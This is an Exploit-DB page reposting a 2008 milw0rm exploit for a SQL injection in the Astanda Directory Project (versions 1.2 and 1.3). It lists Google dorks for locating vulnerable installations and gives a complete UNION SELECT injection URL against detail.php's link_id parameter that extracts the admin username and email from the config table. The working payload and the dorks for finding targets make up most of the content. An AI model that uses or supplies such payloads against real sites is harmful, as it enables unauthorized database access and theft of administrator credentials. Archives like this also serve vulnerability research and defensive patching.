Astanda Directory Project 1.2 - 'link_id' SQL Injection

EDB-ID:

5071

CVE:

2008-0649

EDB Verified:

Author:

you_kn0w

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2008-02-06

Vulnerable App:

#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=#
# ~Author: you_kn0w	                       #
# ~Contact: you-know[at]linuxmail[dot]org      #
# ~Website: www.youknowz.info                  # 
# ~Script: Astanda Directory Project           #
# ~Bug: APD Remote SQL Injection               #
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=#
#               Script Information             #
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=#    
#                                              # 
# Script name: Astanda Directory Project       #
# Script site: http://www.astanda.com/adp      #
# Script demo: http://www.astanda.com/adp/admin#
# Description: Search Engine                   #
# Version: v.1.2 & v.1.3                       #
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=# 


# [-]Dorks:
             intext: Powered by APD
           intext: Â© Copyright 2005, 2006, Astanda.com, Pavel Golovko
         inurl:detail.php?link_id=

       


# [+]How To Exploit:
 
 
 http://[target].com/[path]/detail.php?link_id=-1/**/union/**/all/**/select/**/1,concat(0x3C68313E557365723A203C2F68313E,admin,0x3C68313E456D61696C3A203C2F68313E,email),null,null,0,0,1,1,1,1,0/**/from/**/config/*





# [+]Greetz:
 
 Greetz to; ka0x - Celciuz - JosS - Phanter-Root & Screamo

//you_kn0w
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#

# milw0rm.com [2008-02-06]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services